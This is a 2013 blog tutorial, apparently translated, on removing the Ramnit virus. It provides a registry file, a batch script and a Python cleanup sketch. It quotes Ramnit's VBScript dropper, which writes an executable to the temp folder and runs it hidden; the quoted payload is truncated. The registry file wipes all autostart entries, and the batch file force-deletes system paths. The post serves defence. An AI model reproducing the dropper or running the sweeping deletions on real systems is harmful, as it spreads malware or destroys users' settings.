
Cleaning Ramnit infections from htm / html files

Written By Wachid Rahmad H on Saturday, 18 May 2013 | 17.45

Before starting, first prepare the weapons you will need

>> ramnit_removal.reg
>> ramnit_removal.bat
>> CCleaner
>> CHANET SPLITTERII.exe
download this software: http://www.vaksin.com/2011/0811/immune from ramnit/CHANET SPLITTERII.exe
>> Antivirus (I use Avast)


===============================================================

Windows Registry Editor Version 5.00

; Delete the autostart keys outright. This drops every startup entry, legitimate ones included.
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
; Recreate the same keys, now empty.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
; Point Userinit at userinit.exe only.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="c:\\windows\\system32\\userinit.exe"
; Reset the open commands for .reg, .inf and .exe files to the values below.
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@="regedit.exe \"%1\""
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@="Application"
"EditFlags"=hex:38,07,00,00
"TileInfo"="prop:FileDescription;Company;FileVersion"
"InfoTip"="prop:FileDescription;Company;FileVersion;Create;Size"
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@="%1"
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@="\"%1\" %*"

### save as ramnit_removal.reg

===============================================================
===============================================================

@echo off
REM "This removes/deletes the main virus files"
del /f /s /q /a "%ProgramFiles%\Microsoft\WaterMark.exe">Delete_Log.txt
del /f /s /q /a "%ProgramFiles%\Microsoft\DesktopLayer.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\System32\dmlconf.dat">>Delete_Log.txt
REM "This erases other tricky worm files, if they exist"
del /f /s /q /a "%Systemroot%\dmlconf.dat">>Delete_Log.txt
del /f /s /q /a "%Systemroot%\lssas.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\ExplorerSrv.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\System32\rundll32Srv.exe">>Delete_Log.txt
del /f /s /q /a "%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exe">>Delete_Log.txt
del /f /s /q /a "%UserProfile%\Local-Settings\Application Data\\.exe">>Delete_Log.txt
REM "This prevents the virus from coming back"
REM "A read-only system folder with the file's name keeps that file from being recreated"
mkdir "%ProgramFiles%\Microsoft\WaterMark.exe"
attrib +r +s -h -a "%ProgramFiles%\Microsoft\WaterMark.exe" /s /d
mkdir "%ProgramFiles%\Microsoft\DesktopLayer.exe"
attrib +r +s -h -a "%ProgramFiles%\Microsoft\DesktopLayer.exe" /s /d
mkdir "%systemroot%\System32\dmlconf.dat"
attrib +r +s -h -a "%systemroot%\System32\dmlconf.dat" /s /d
REM "This restores the registry settings"
REM "%~dp0 is this script's own folder, so the import also works when run as administrator"
reg import "%~dp0ramnit_removal.reg"
exit

### save as ramnit_removal.bat ###

===============================================================


***************************************************************
***************************************************************
Put both of these files in one folder
ramnit_removal.bat
ramnit_removal.reg

After that, install / double-click

After that, repair the registry using CCleaner,
then empty the recycle bin

At this point, have a smoke first to unwind :D
Restart your PC, then press F8
and enter SAFE MODE


Then run CHANET SPLITTERII.exe. Just scan all drives

Chanet Splitterii's job is to remove this bastard script
" <SCRIPT language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--> "

This is usually found in every htm / html file.
I used this home-grown software to make things easier,
because there were +/- 16,000 infected html files. Deleting it by hand would be exhausting =))
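
A defender-side sketch of the same cleanup, added here as an example (it is not Chanet Splitterii's code and not from the original post): it recognises the appended VBScript block by the markers quoted above and strips only that block from .htm/.html files. It assumes the block is closed by `</SCRIPT>`, which the quote above does not show; `strip_ramnit`, `clean_tree` and the sample page are constructed for this example.

```python
import re
from pathlib import Path

# Every <script>...</script> element; group 1 is the opening tag, group 2 the body.
SCRIPT_RE = re.compile(r"(<script\b[^>]*>)(.*?)</script\s*>", re.I | re.S)
# Markers from the snippet quoted in the post. 4D5A is "MZ", the first two
# bytes of a Windows executable, written as hex text.
MARKERS = (
    re.compile(r"DropFileName\s*=", re.I),
    re.compile(r'WriteData\s*=\s*"4D5A[0-9A-F]', re.I),
    re.compile(r"WSHshell\.Run\s+DropPath", re.I),
)

def strip_ramnit(html: str) -> tuple[str, int]:
    """Return (cleaned_html, blocks_removed); other scripts are left alone."""
    removed = 0

    def repl(m: re.Match) -> str:
        nonlocal removed
        if "vbscript" in m.group(1).lower() and all(p.search(m.group(2)) for p in MARKERS):
            removed += 1
            return ""
        return m.group(0)

    cleaned = SCRIPT_RE.sub(repl, html)
    return (cleaned.rstrip() + "\n", removed) if removed else (html, 0)

def clean_tree(root: str, dry_run: bool = True) -> list[Path]:
    """List infected .htm/.html files under root; rewrite them unless dry_run."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in (".htm", ".html"):
            continue
        # latin-1 maps every byte to one character, so the file round-trips unchanged
        cleaned, n = strip_ramnit(path.read_bytes().decode("latin-1"))
        if n:
            hits.append(path)
            if not dry_run:
                path.write_bytes(cleaned.encode("latin-1"))
    return hits

# Constructed sample: a harmless VBScript element plus the appended block
# with its payload cut down to a few hex digits.
SAMPLE = (
    '<html><body><script language=VBScript>MsgBox "hi"</script></body></html>\r\n'
    '<SCRIPT language="VBScript"><!--\r\nDropFileName = "svchost.exe"\r\n'
    'WriteData = "4D5A9000"\r\nWSHshell.Run DropPath, 0\r\n//--></SCRIPT>'
)
```

clean_tree(root) only reports by default; pass dry_run=False to rewrite the files, preferably on a copy or after a backup.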

When that is done, to check whether ramnit is gone or not, use an up-to-date antivirus.
I used the latest Avast, then scanned via BOOT SCAN.
As a result, the ramnit virus was completely cleaned from my PC
*****************************************
Relax, your htm / html files that were infected by this ramnit virus are NOT LOST.
What is lost is the virus. The files are perfectly safe.

Before starting, prepare the weapons first: Senjata Clean Ramnit